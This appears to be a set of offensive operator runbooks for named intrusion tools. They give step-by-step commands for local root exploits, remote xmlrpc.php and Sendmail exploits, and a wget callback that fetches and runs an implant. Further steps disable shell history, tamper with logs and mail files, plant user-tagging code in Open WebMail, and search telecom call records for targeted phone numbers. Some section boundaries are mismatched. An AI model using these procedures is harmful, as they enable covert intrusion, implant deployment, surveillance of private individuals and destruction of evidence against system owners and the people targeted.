### (see also ../etc/user.tool.dittlelight_hidelite.COMMON)
###
### BEGIN File user.tool.draftbagger.COMMON (see also ../etc/user.tool.draftba
gger.COMMON)
###
##### DRAFTBAGGER #####
### Assumes have already talked to SNAT via SnatLp
### Search/replace commands
:%s/ROUTER_IP/ROUTER_IP/g
:%s/PROXY_IP/PROXY_IP/g
:%s/RADIUS_IP/RADIUS_IP/g
:%s/RANDOM_HIGH/RANDOM_HIGH/g
### These aren't really means to be used as search/replace in this script, more
### placeholders for the example commands, but here are the commands anyway,
### commented out so you really shouldn't run them
#:%s/LOCAL_TUNNEL_COMMANDS_PORT/LOCAL_TUNNEL_COMMANDS_PORT/g
#:%s/NOPEN_PID/NOPEN_PID/g
#:%s/PARTIAL_MATCH_TARGS/PARTIAL_MATCH_TARGS/g
#:%s/EXACT_MATCH_TARGS/EXACT_MATCH_TARGS/g
### get the date of the current radius log on the radius server
-lt /var/log/radius/ # (find the most current, should be last file in list)
-lt /var/log/radius/<date> # (file needed is the acct.log file)
### Will check to make sure the log file exists, check to makes sure the
### "-tunnel LOCAL_TUNNEL_COMMANDS_PORT udp" command was run, and then
### starts a "tail -f" on the logfile to constantly bring the file home,
### this gives you two pastables: a "-tunnel PORT udp" command to run on the
### radius server, and a "parse_rads.pl" one to run in a locally scripted window
### run the "-tunnel" (use the one spit out, the one below is an example) on
### the box that will be talking to SNAT
-tunnel LOCAL_TUNNEL_COMMANDS_PORT udp
### Below is an example command, will need to use the pastable spit out by
### "-gs parse_rads" for the current session, but some things will need to
### be added to the command spit out, i.e. -p/-P args (phone numbers), the
### -R arg (treat already downloaded data as real-time, i.e. set up initial
### rules based on it), the IP address of the proxy, and any other stuff to
### play with
###
### -N -a -i are filled in by -gs parserads. Others need to be added manually
PORT=LOCAL_TUNNEL_COMMANDS_PORT parse_rads.pl -NRADIUS_IP:NOPEN_PID -a127.0.0.1:
RANDOM_HIGH -i/current/down/HOSTNAME.RADIUS_IP/var/log/radius/CURRENT_DATE/acct.
log -p PARTIAL_MATCH_TARGS -P EXACT_MATCH_TARGS -R PROXY_IP
### Will ask for pager numbers, and ask for confirmation that a sufficiently
### up-to-date version of SNAT is being used, go ahead and confirm these
### Should be able to get other instructions for DRAFTBAGGER UI
### when Op is complete, in the DB command window, run the following to close ou
t
### NOTE: ANSWER "no" TO THE PROMPT ASKING WHETHER TO KEEP THE SNAT
### FILTERS ACTIVE
diediedie
### Ctrl-C your "tail -f" command on RADIUS server, or kill the appropriate pid
### In a local window, you can use the scripts "closetunnel" and "dotunnel" to
### interact with a -tunnel listening on a port for commands rather than stdin
### (i.e. "-tunnel LOCAL_TUNNEL_COMMANDS_PORT udp")
### "dotunnel" will send all command line args to that port for -tunnel to get
### "closetunnel" has hard-coded "c 1 2 3 4 5 6 7", and then "q"...this will
### get the Nopen prompt back
# Examples:
dotunnel s
dotunnel l 1390 1.2.3.4 139
closetunnel
### CLOSE OUT THE REST OF THE OP AS YOU WOULD NORMALLY
###
### END File user.tool.draftbagger.COMMON
### (see also ../etc/user.tool.draftbagger.COMMON)
###
### BEGIN File user.tool.elgingamble.COMMON (see also ../etc/user.tool.elginga
mble.COMMON)
###
#######################################
# ELGINGAMBLE
#######################################
### local exploit for the following operating system versions:
### Linux 2.6.13 - 2.6.17.4 and certain distros that contain a backport of the
### vulnerable functionality
### Local exploit for the public prctl core dump vulnerability in recent Linux k
ernels.
### It takes advantage of an input validation/logic error in the kernel to creat
e
### a cron script that will spawn a root shell.
### OPSEC:
### vulnerability: public
### exploit: public
###
### CHECK IF TARGET IS VULNERABLE
###
### check OS (for Linux 2.6.13 - 2.6.17.4)
uname -a
### make sure crond is running:
ps -ef | grep crond
### check if you have READ permission on /etc/cron.d (WRITE is part of the vuln.
):
-lt /etc/cron.d
### make sure you have EXECUTE permission on crontab:
which crontab
-lt /usr/bin/crontab
### check if there is a cron.allow or cron.deny that might hinder your success:
-lt /etc/cron*
-cat /etc/cron.allow
-cat /etc/cron.deny
###
### if the above checks pass, you can try running it:
### USAGE:
# elgingamble:
# -h (optional) Prints a help message
# -d (optional) Used to specify the system cron directory (defaults /etc/cron.d
)
# -p (optional) Used to specify the core file prefix (defaults cron.PID)
# -s (optional) Used to specify a shell besides /bin/sh
# -t (optional) Used to specify the exploit timeout (defaults 5 minutes)
### upload to target:
-put /current/up/elgingamble eg
### within nopen, run it from within -shell
-shell
./eg
# You'll see the following messages, you must wait for the cronjob to run:
# can't set core limit, trying indirect
# crontab installed
# must do crontab -r when finished
# waiting for re-exec, ETA 60-120s
# after waiting for the cronjob, run the following and start a new noserver
# once you gain root access:
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
id
PATH=. sendmail
### CLEANUP:
crontab -l
crontab -r
-lt /etc/cron.d
-rm /etc/cron.d/core.PID
-rm eg sendmail
-lt
### LOGS:
-lt /var/log/cron
-tail /var/log/cron
###
### TROUBLESHOOTING
###
# Exploit fails with message "kernel not vulnerable". The kernel is not vulnerab
le
# to exploitation.
# Remedy:None
# Exploit fails with message "failed: indirect". The exploit tried and failed to
# have cron call it indirectly to bypass resource limitations. This can occur if
# the crontab program is not installed, could not be found, or is restricted thr
ough
# the use of cron.allow and cron.deny.
# Remedy:Make sure crontab is installed on the system and useable by the system
# user you use to run the exploit.
# Exploit fails with message "failed". The exploit was unable to elevate to root
.
# This indicates that the cron command was never executed. One possible reason
for
# failure is if the coredump created in the system cron directory is too small t
o
# contain a valid cron command. Other reasons could be that the cron directory
# is not accessible by non-priveleged users, or the cron daemon is not running o
n the system.
# Remedy:Make sure the cron daemon is running and the user running the exploit
# has read access to the system cron directory. Also check the core file limit.
#
# Description: Any other failure message. Remedy: Make sure the default exploit
parameters,
# such as cron directory and core file prefix, are valid for the target system.
# If not, rerun the exploit and specify the appropriate parameters on the comman
d line.
###
### END File user.tool.elgingamble.COMMON
### (see also ../etc/user.tool.elgingamble.COMMON)
###
### BEGIN File user.tool.enoltog.COMMON (see also ../etc/user.tool.enoltog.COM
MON)
###
#######################################
# ENOLTOG
#######################################
### Software modification to the Open WebMail software to target specific users
of interest.
### Used to insert a FOXACID/HUFFMUSH tag.
### Version 1 will target the first five users to login into the system.
### Version 2 will target specific users.
### NOTE: Due to the uniqueness of each target and the source code modification
required,
### SUGGEST DEVELOPER BE PRESENT DURING INITIAL DEPLOYMENT TO TARGET!!!!!!
###
### OPSEC:
# anyone viewing the source file will be able to see the added code.
###
### LOCALLY do the following:
###
### make a backup copy
cd /current/up
cp /current/down/HOSTNAME//var/www/cgi-bin/openwebmail/openwebmail-main.pl /curr
ent/up/openwebmail-main.pl
### edit ##ONE## of the following files, depending on the deployment type:
### For openwebmail-main-first-five-users.pl:
#############################################
# change the "<5" to the correct number of users
# change the target tag in the gif line - should NOT reuse the same
# target tag on different projects!!!!
### next, edit the local copy of the original file, and insert the code from the
above
### step in the correct places
vi /current/up/m
###
### On target, upload the modified openwebmail:
###
mkdir /tmp/.scsi
-cd /tmp/.scsi
-put openwebmail-main.pl m
-put openwebmail-test.pl o
###
### CLEANUP DIRECTORY:
###
-rm m
-cd ..
-rm .scsi
-ls -t
### TROUBLESHOOTING:
# Determine the MD5 digest of the user
echo -n <USERNAME> | md5sum
# Determine if showthread.php is executable
-ls /var/www/cgi-bin/openwebmail/openwebmail-main.php
# upload and run test script openwebmail-test.pl
-put /current/up/openwebmail-test.pl o
./o
# should see
1
2
# clean up results
###
### END File user.tool.enoltog.COMMON
### (see also ../etc/user.tool.enoltog.COMMON)
###
### BEGIN File user.tool.excelberwick.COMMON (see also ../etc/user.tool.excelb
erwick.COMMON)
###
#######################################
# EXCELBERWICK
#######################################
### remote exploit against xmlrpc.php on Unix platforms
###
### WILL REQUIRE LOCAL ELEVATION
### sybil location: CGI-BIN
### Exploits a vulnerability in the XML-RPC PHP script. The vulnerable
### file is used in a large number of web applications, such as Drupal,
### b2evolution, and TikiWiki. The vulnerability is the result of
### unsanitized data being passed directly to the eval() call
### in the parseRequest() function of the XML-RPC server
### OPSEC:
### vulnerability: public
### exploit: public
### Usage:
# ./xp_xmlrpc.pl
usage: ./xp_xmlrpc.pl -i<host> -d<dir/file> -c<commands to run>
-i <host/IP, ex: 127.0.0.1>
-d </directory/xmlrpc.php, ex: /drupal/xmlrpc.php>
-p <port, default: 80>
-o <turn off IDS mode>
-v <for virtual host: default -i>
-a <automatically exploit all known scripts. Very noisy.>
0: /xmlrpc.php
1: /blog/xmlrpc.php
2: /blog/xmlsrv/xmlrpc.php
3: /blogs/xmlsrv/xmlrpc.php
4: /drupal/xmlrpc.php
5: /phpgroupware/xmlrpc.php
6: /wordpress/xmlrpc.php
7: /xmlrpc/xmlrpc.php
8: /xmlsrv/xmlrpc.php
9: /b2/xmlsrv/xmlrpc.php
10: /b2evol/xmlsrv/xmlrpc.php
11: /community/xmlrpc.php
12: /blogs/xmlrpc.php
-c <commands to run>
Examples:
1) ./xp_xmlrpc.pl -i127.0.0.1 -d/drupal/xmlrpc.php -c"uname -a;ls -la;w"
2) ./xp_xmlrpc.pl -i127.0.0.1 -d/drupal/xmlrpc.php -c"(mkdir /tmp/.scsi;
cd /tmp/.scsi; /usr/bin/wget http://555.1.2.150:5555/sendmail -Osendmail;chmod +
x sendmail;D=-c555.1.2.150:9999 PATH=. sendmail) 2>/dev/null"
mx
:%s/TARGET_IP/TARGET_IP/g
:%s/WEB_PORT/WEB_PORT/g
:%s/NETCAT_PORT/NETCAT_PORT/g
:%s/REDIR_IP/REDIR_IP/g
:%s/NOPEN_PORT/NOPEN_PORT/g
'x
### Then check if vulnerable by running the "-a" option to exhaust all options
# WEB-PORT is usually '80' unless the target is using something else, or you
# choose to tunnel it differently
# redirector:
-tunnel
l WEB_PORT TARGET_IP
# local script window:
./xp_xmlrpc.pl -i127.0.0.1 -pWEB_PORT -a -c"w"
### Look through the output; a successful hit will be followed by
### the results of the command issued by the "-c" option, in the suggested case,
### the results of "w'
### Each unsuccessful version will be followed by "404 not found" errors
### If the previous command yielded a successful attempt, then run the exploit a
gain
### but substitute the version that was successful instead of using "-a"
# on redirector:
-nrtun NOPEN_PORT
### Replace "VERSION" with the appropriate php script, then run exploit to uploa
d and execute nopen:
### connect:
-nstun TARGET_IP
###
### TROUBLESHOOTING:
###
# Try this to get interactive windows (you'll type in one, and get output in the
other):
mx
:%s/PORT1/PORT1/g
:%s/PORT2/PORT2/g
'x
# Local scripted window #1:
nc -l -vv -p PORT1
###
### CLEANUP:
###
# Logging directory depends on type of web software running on target (check -fi
nd):
# Try /var/log/httpd:
# access_log
# referer_log
# error_log
###
### END File user.tool.excelberwick.COMMON
### (see also ../etc/user.tool.excelberwick.COMMON)
###
### BEGIN File user.tool.dittoclass.COMMON (see also ../etc/user.tool.dittocla
ss.COMMON)
###
##### DITTOCLASS #####
### Search/replace commands
### OLD PKG NAME: if DC prev installed, name of pkg, if not then leave alone
### OLD DITTOCLASS DIR: if DC prev installed, directory where it was installed
### NEW PKG NAME: name of new DC installation package
### NEW DITTOCLASS DIR: directory where DC will be installed
:%s/OLD_PKG_NAME/OLD_PKG_NAME/g
:%s/OLD_DITTOCLASS_DIR/OLD_DITTOCLASS_DIR/g
:%s/NEW_PKG_NAME/NEW_PKG_NAME/g
:%s/NEW_DITTOCLASS_DIR/NEW_DITTOCLASS_DIR/g
### Check to see if DITTOCLASS already on target (if fails, not implanted).
### Make sure check for other implants too.
### NOTE: Must use "cat", "-cat" will not work
### Doing "cat /proc/OLD_PKG_NAME" will register you to see hidden resources
### If neither of the "cat" commands work and you think there is an old
### installation, the "ls" command below should still work, if not there is
### probably nothing there
cat /proc/listfiles
cat /proc/OLD_PKG_NAME
ls -la /OLD_DITTOCLASS_DIR/OLD_PKG_NAME
### After uninstall, in a NOPEN window, grep for the old package name
### and kill any of the processes associated with it
netstat -anlp | grep OLD_PKG_NAME
ps -ef | grep OLD_PKG_NAME
kill -9 OLD_PKG_NAME_PIDS
### Make sure unable to connect with hector if connected with hector before
# Use whatever command used to get on
cd /current/bin
hector .... # your previous hector command line
###
### Get a "before" picture of the device where /tmp resides
###
# find the device that is mounted on /tmp (ex.- /dev/hdb3) and make note;
# if /tmp does not have its own filesystem, use the device of "/"
df -k
# look at the perms of the DEVICE, then make note of the group id; typically sho
uld be "disk"
# ex: -ls /dev/hdb3
-ls <DEVICENAME>
# correlate the groupid to a digit by finding it in /etc/group, then save the nu
meric value
# ex: -grep disk /etc/group
-grep <GROUPNAME> /etc/group
###
### upload and execute
###
-put /current/up/exze exze
# run the script (within nopen, use -shell)
-shell
./exze
### A status code will show up while the program is running.
### The following value should indicate potential success: 0x000 <gid on device
file>
### The <gid> should be the same as you found out from the initial checks
### MAKE NOTE OF THE VALUE REPORTED BACK ON THIS INITIAL ATTEMPT IN CASE OF FAIL
URE!!!
### Any value other than 0x000 is an error code (see other documentation)
### Wait about 5 minutes (for the cache flushing) and you should get a root prom
pt, then:
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
id
# start a new noserver
PATH=. crond
###
### IF AT FIRST YOU DON'T SUCCEED....... try, try..... the following in order:
###
### If you received an error that permissions didn't change, you may try again.
### Next, try using the -r option. This option will prevent the temporary shell
### file from being removed if there is an error so that the operator will have
a chance
### to do the cache flushing manually.
-shell
./exze -r
### if successful, run the "unset"s from above - you have root and can cleanup
### If the 'permissions didn't change' error still happens, the flushing procedu
re
### will need to be performed manually before proceeding to the next step.
find / -type f -exec cat {} \; > /dev/null
### ONLY AFTER the 'find' completes, check the permissions of the shell file in
/tmp:
### should be rws--x--- and owned by root
### DO NOT EXECUTE, OPEN, READ, OR WRITE TO THE SHELL FILE BEFORE THE EXPLOI
T FINISHES
### AS IT MIGHT UNDO THE CHANGES MADE TO THE DISK!! THIS MEANS DO NOT DO AN LS
### ON THE FILE OR TOUCH IT IN ANY MANNER UNTIL THE EXPLOIT COMPLETES.
-lt /tmp
### if the permissions have changed, then manually attempt to get a root shell;
### the -d and -i options will attempt to perform the cleanup of the shell file
in /tmp
### and reset the group perms of the DEVICE
-lt /tmp
-shell
/tmp/file<######> -d <DEVICE> -i <GID>
### if you don't get root by now, you probably won't
###
### CLEANUP
###
### no cleanup if successful the first time, however....
### there may be cleanup involved under the following conditions:
### the exploit did NOT work on the first attempt
### the exploit was aborted
### the connection to target was dropped
### check the group id of the DEVICE where /tmp resides;
### if the group is not the same as it was originally, set it to
### the gid echoed back in your INITIAL ATTEMPT (digit following 0x000)
### NOTE: if you didn't get root, you may not be able to chgrp the device
### but hopefully, the exploit will have set it to gid '0' to be
### less conspicuous than that of your user's gid
-lt /dev/<DEVICENAME>
chgrp <GID> /dev/<DEVICENAME>
-lt /dev
###
### END File user.tool.expitiatezeke.COMMON
### (see also ../etc/user.tool.expitiatezeke.COMMON)
###
### BEGIN File user.tool.englandbogy.COMMON (see also ../etc/user.tool.england
bogy.COMMON)
###
#######################################
# ENGLANDBOGY
#######################################
### local exploit against Xorg for the following versions:
### Xorg X11R7 1.0.1, X11R7 1.0, X11R6 6.9
### Includes the following distributions:
### MandrakeSoft Linux 10.2, Ubuntu 5.0.4, SuSE Linux 10.0,
### RedHat Fedora Core5, MandrakeSoft Linux 2006.0
### Fails-on - Xorg X11R7 1.0.2 and greater and less than Xorg X11R6 6.9.
### Requirements - Target needs to have the Xorg binary as SETUID root.
###
### Exploits the Xorg X server by allowing unprivileged users load arbitrary mod
ules
### OPSEC:
### vulnerability: public
### exploit: public
### Determine if vulnerable:
uname -a
### get Xorg version; should be one listed above:
Xorg -version
### see if Xorg is setuid root- should look similar to this (-rwsr-xr-x )
ls -la /usr/bin/Xorg
###
### END File user.tool.englandbogy.COMMON
### (see also ../etc/user.tool.englandbogy.COMMON)
###
### BEGIN File user.tool.earlyshovel.COMMON (see also ../etc/user.tool.earlysh
ovel.COMMON)
###
#########################################################
# EARLYSHOVEL
#########################################################
### publicly known vulnerability
### remote exploit available for linux RH7 running sendmail
###Supported targets:
### "ASPRH73": ASP Linux 7.3 or RedHat 7.3 running Sendmail 8.11.6
### "RH70": RedHat 7.0 running Sendmail 8.11.0
### "RH71": RedHat 7.1 running Sendmail 8.11.2
### "RH73": RedHat 7.3 running Sendmail 8.11.6
### requires valid user name ( 7.1 and 7.3)
### may also require valid domain for (7.3)
mx
:%s/REDIRECTOR_IP/REDIRECTOR_IP/g
:%s/TARGET_IP/TARGET_IP/g
:%s/TARGET_OS/TARGET_OS/g
:%s/USER_NAME/USER_NAME/g
:%s/DOMAIN/DOMAIN/g
:%s/RANDOM_PORT/RANDOM_PORT/g
`x
#banner mail
-scan mail TARGET_IP
# alternate way to banner
##on pitch
-tunnel
l 2525 TARGET_IP 25
###local scripted
telnet 127.0.0.1 2525
## after getting banner
helo DOMAIN
mail from: user@DOMAIN # use random user name
### may be getting rejected as spam???
$ ./eash.py -?
usage:
/current/bin/earlyshovel/eash.py [options]
options
--atimeout seconds (default = 30)
Authentication timeout (in seconds)
--cip IPAddress (default = 127.0.0.1)
Callback IP address
--clport port
Local callback port
--cport port
Callback port
--ctimeout seconds (default = 30)
Callback timeout (in seconds)
--domain domainName
Domain name of sender
--exec filename
File to exec on successful upload
-? | --help
Print the usage message
--recipient emailAddress (default = root)
Email recipient
--target target
Target OS
--tip IPAddress (default = 127.0.0.1)
Target IP address
--tmpnam filename
Remote name of the uploaded file (of the form /tmp/fileXXXXXX)(def=filekdB
tDF)
--tport port (default = 25)
Target port
--upload filename
File to upload
Supported targets:
"ASPRH73": ASP Linux 7.3 or RedHat 7.3 running Sendmail 8.11.6
"RH70": RedHat 7.0 running Sendmail 8.11.0
"RH71": RedHat 7.1 running Sendmail 8.11.2
"RH72": RedHat 7.2 running Sendmail 8.11.6
### REDIRECTION
-tunnel
l 2525 TARGET_IP 25
r RANDOM_PORT
### LOCAL WINDOW: UPLOADS NOPEN AUTOMATCALLY- as of VERSION 2.4.0
cd /current/bin/earlyshovel
./eash.py --tip 127.0.0.1 --tport 2525 --cip REDIRECTOR_IP --cport RANDOM_PORT
--recipient USER_NAME --target TARGET_OS --domain DOMAIN --exec /current/bin/no
client --upload /current/up/morerats/noserver-3.0.3.1-i586.pc.linux.gnu.redhat-5
.0
-OR-
### LOCAL WINDOW:MANUAL UPLOAD of NOPEN
cd /current/bin/earlyshovel
./eash.py --tip 127.0.0.1 --tport 2525 --cip REDIRECTOR_IP --cport RANDOM_PORT
--recipient USER_NAME --target TARGET_OS
./eash.py --tip 127.0.0.1 --tport 2525 --cip REDIRECTOR_IP --cport RANDOM_PORT
--recipient USER_NAME --target TARGET_OS --domain DOMAIN
### you will get an interactive root shell
unset HISTFILE
unset HISTFILESIZE
unset HISTSIZE
id
pwd
w
-get /var/spool/mail/USER_NAME
#locally
cp /current/down/hostname.IP/var/spool/mail/USER_NAME /current/up/t
cd /current/up/t
#remove email from t
-put /current/up/t t
#target window
#if it looks good
cat t > /var/spool/mail/USER_NAME
# touch file to a "good" date
touch -t YYMMDDHHMM.ss /var/spool/mail/USER_NAME
#does user have a home dir
grep USER_NAME /etc/passwd
# look for users home dir and list it
-lt ?/?/USER_NAME
## look for .procmail or .forward files
cat files if there....
###
### END File user.tool.earlyshovel.COMMON
### (see also ../etc/user.tool.earlyshovel.COMMON)
###
### BEGIN File user.tool.curserazor.COMMON (see also ../etc/user.tool.curseraz
or.COMMON)
###
################ CURSERAZOR #########################
############### PARSING #######################################################
############
### vi Search/Replace commands ###
### ProjectName - self explanatory
### Date field - today's date, used for output files
### Host - hostname of the box (not IP address)
### Cryptkey - encryption key (use output from below md5sum command)
md5sum /current/down/tcpdump.raw
mx
:%s/PROJECTNAME/PROJECTNAME/g
:%s/DDMonYY/DDMonYY/g
:%s/HOST/HOST/g
:%s/CRYPTKEY/CRYPTKEY/g
'x
### Save the encryption key locally:
echo CRYPTKEY > /current/down/cryptkey.curserazor.DDMonYY
####### Prepare files containing numbers to search for:
# if files containing the numbers to search available:
mkdir /current/down/argfiles
cd /current/down/argfiles
mz
cp /mnt/zip*/arg* /current/down/argfiles
#or
cp /mnt/zip*/PROJECTNAME/arg* /current/down/argfiles
ls -altr
##### Upload the encrypted phone list as awk, modify each parser command to hav
e the
##### correct directory and date range of files to parse, then run the parser:
##### NOTE: MUST CORRELATE NUMBERS IN ENCRYPTED TASKING FILENAMES (i.e. argfile1
.enc)
##### TO OUTPUT FILENAMES (cdrhits*.enc1, cdrhits*.enc1.more, cdrhits*.enc1.more
2, etc.)
##### NOTE2: GO FROM MOST RECENT TIME TO (PROBABLY CURRENT DATE) AS FAR BACK AS
TIME ALLOWS
############ argfile 1
-put /current/down/argfiles/argfile1.enc awk
-setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -nam
e '*2007103*GCDR' -print" -P ./awk
nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc1
-beep 15
### Run again if needed for same tasking
-put /current/down/argfiles/argfile1.enc awk
-setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -nam
e '*2007102[89]*GCDR' -print" -P ./awk
./nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc1.more
-beep 15
############ argfile 2
-put /current/down/argfiles/argfile2.enc awk
-setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -nam
e '*2007103*GCDR' -print" -P ./awk
nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc2
-beep 15
### Run again if needed for same tasking
-put /current/down/argfiles/argfile2.enc awk
-setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -nam
e '*2007102[89]*GCDR' -print" -P ./awk
./nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc2.more
-beep 15
############ argfile 3
-put /current/down/argfiles/argfile2.enc awk
-setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -nam
e '*2007103*GCDR' -print" -P ./awk
nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc2
-beep 15
### Run again if needed for same tasking
-put /current/down/argfiles/argfile2.enc awk
-setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -nam
e '*2007102[89]*GCDR' -print" -P ./awk
./nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc2.more
-beep 15
######
###### survey mode:
######
### checks for IMEIs that have more than one IMSI associated with it:
### to limit amount of memory used, replace "-x" with "-X numberBytes"
-setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -nam
e '*2007102[89]*GCDR' -print" -x
./nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc.surveyIMEI
### generates a list of Cell IDs associated with each MSC address:
### to limit amount of memory used, replace "-y" with "-Y numberBytes"
-setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -nam
e '*2007102[89]*GCDR' -print" -y
./nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc.surveyMSC
######
##### when it's done running, decrypt the file (-d -c options)
######
cd /current/down
ls -latr cdrhits*enc*
# to decrypt individually:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.curserazor.HOST.DDMonYY.enc1 -
o cdrhits.curserazor.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.curserazor.HOST.DDMonYY.enc2 -
o cdrhits.curserazor.HOST.DDMonYY.txt2 -k CRYPTKEY -d -c
#####
##### clean up
#####
-rm nscd awk
-lt
-cd /tmp
-lt
w
ps -ef | sort
-lt /
-burnBURN
###
### END File user.tool.curserazor.COMMON
### (see also ../etc/user.tool.curserazor.COMMON)
###
### BEGIN File user.tool.cursehappy.preversion4.COMMON (see also ../etc/user.t
ool.cursehappy.preversion4.COMMON)
###
################ CURSEHAPPY #########################
############### PARSING #######################################################
############
### vi Search/Replace commands ###
### ProjectName - self explanatory
### Date field - today's date, used for output files
### Rec type - record type correlates with ProjectName, valid values: eh, ls, ss
, wb
### Host - hostname of the box (not IP address)
### Cryptkey - encryption key (use output from below md5sum command)
md5sum /current/down/tcpdump.raw
mx
:%s/PROJECTNAME/PROJECTNAME/g
:%s/DDMonYY/DDMonYY/g
:%s/RECTYPE/RECTYPE/g
:%s/HOST/HOST/g
:%s/CRYPTKEY/CRYPTKEY/g
'x
### Save the encryption key locally:
echo CRYPTKEY > /current/down/cryptkey.cursehappy.DDMonYY
####### Prepare files containing numbers to search for:
# if files containing the numbers to search available:
mkdir /current/down/argfiles
cd /current/down/argfiles
mz
cp /mnt/zip*/arg* /current/down/argfiles
#or
cp /mnt/zip*/PROJECTNAME/arg* /current/down/argfiles
ls -altr
# isbapro1 10.5.7.51
# nothing new
-lt /u01/product_evdp/evident/data_store/collect
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc | head -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc | tail -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_khi01 | head -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_khi01 | tail -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_isb01 | head -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_isb01 | tail -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_lhr01 | head -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_lhr01 | tail -
10
-lt /u03/archive/collect
# newer stuff
ls -latr /u03/archive/collect/siemens_msc_isb01 | head -10
ls -latr /u03/archive/collect/siemens_msc_isb01 | tail -10
ls -latr /u03/archive/collect/siemens_msc_isb01 | wc -l
# old stuff:
ls -latr /u03/archive/collect/siemens_msc_khi01 | head -10
ls -latr /u03/archive/collect/siemens_msc_khi01 | tail -10
########################## editionhaze:
ls -latr /u06/saba/CDR/out/MS* | head -10
ls -latr /u06/saba/CDR/out/MS* | tail -10
ls -latr /u06/saba/CDR/out/MS* | wc -l
########################## liquidsteel:
########################## sicklestar:
### magnum: CURSEHAPPY not working on all SS .usd files :-(
### Try these first, should be all of them in one spot
ls -latr /usd_archive/mc_storage/*usd | head -10
ls -latr /usd_archive/mc_storage/*usd | tail -10
### If none in previous ones...
ls -latr /sys1/var/billing/out_coll/*usd | head -10
ls -latr /sys1/var/billing/out_coll/*usd | tail -10
ls -latr /sys1/var/alcatel/out_coll/*usd | head -10
ls -latr /sys1/var/alcatel/out_coll/*usd | tail -10
ls -latr /sys1/var/billing/msc_is2 | tail -20
########################## CURSEHAPPY #########################################
###############
################################################################################
###############
### Now, encrypt the ascii list...first make sure you have the encryption tool:
which cryptTool.v1.0.Linux2.4.18-14.targetdl
### If cryptTool not in PATH, change your PATH or insert full path in command
### to encrypt one at a time...skip to next comment to encrypt all at once:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile1.txt -o argfile1.enc -k CRYPTK
EY -b
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile2.txt -o argfile2.enc -k CRYPTK
EY -b
file argfile*.enc
### to encrypt all at the same time:
for i in argfile* ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename
$i .txt`.enc -k CRYPTKEY -b ; done
ls -l
file argfile*.enc
### Tips for running the CURSEHAPPY 3.2
### DO NOT _APPEND_ to the local file if using encryption - (no >>L: or
>>T: )!!!!
### per each argfile, create .enc1, .enc1.more, .enc1.more2, etc if
additional
### passes are needed for the date range
### DO NOT use -loglevel if also using >L: or >T: (mixed output corrupts
the decryption)
### The phone list is NOT deleted automatically in v3.2
### remove it between each run as a practice
### Useful options:
-n name of text file containing phone numbers
-rt record type: eh, ls, ss, RECTYPE
-files list of files to parse (can contain wildcards) optional - same a
s no option
-d output optional fields
-all all record output (no search performed)
-loglevel [#] level of info emitted via stderr:0,1,2,3
#############
############# for loglevel testing (local file should be ascii?)
#############
-put /current/down/argfiles/argfile1.enc adm
KEY=CRYPTKEY; export KEY; ./crond -rt RECTYPE -n ./adm -w e -loglevel 2 -d /CHAN
GEME/CDRFILES.2006071[0-2]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.tes
t
-beep 15
-rm adm
######
##### when it's done running, decrypt the file (-d -c options)
######
cd /current/down
ls -latr cdr*enc*
# to decrypt individually:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.cursehappy.HOST.DDMonYY.enc1 -
o cdrhits.cursehappy.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.cursehappy.HOST.DDMonYY.enc2 -
o cdrhits.cursehappy.HOST.DDMonYY.txt2 -k CRYPTKEY -d -c
######
###### copy DECRYPTED data to media
######
ls -l cdr*txt*
mz
cp cdr*txt* /mnt/zip*/PROJECTNAME
ls -l /mnt/zip*/PROJECTNAME
uz
#####
##### clean up
#####
-rm crond adm
-lt
-cd /tmp
-rm .scsi
-lt
w
ps -ef | sort
-lt /
-burnBURN
###
### END File user.tool.cursehappy.preversion4.COMMON
### (see also ../etc/user.tool.cursehappy.preversion4.COMMON)
###
### BEGIN File user.tool.elideskew.COMMON (see also ../etc/user.tool.elideskew
.COMMON)
###
#########################################################
# ELIDESKEW v1.0.0.1
#########################################################
### Public known vulnerablity in SquirrelMail versions 1.4.0 - 1.4.7
### Patched for versions => 1.4.8
### Tested on CentOS and FreeBSD successfully
### will be apache on target; use approprate tool( if available) to elevate
mx
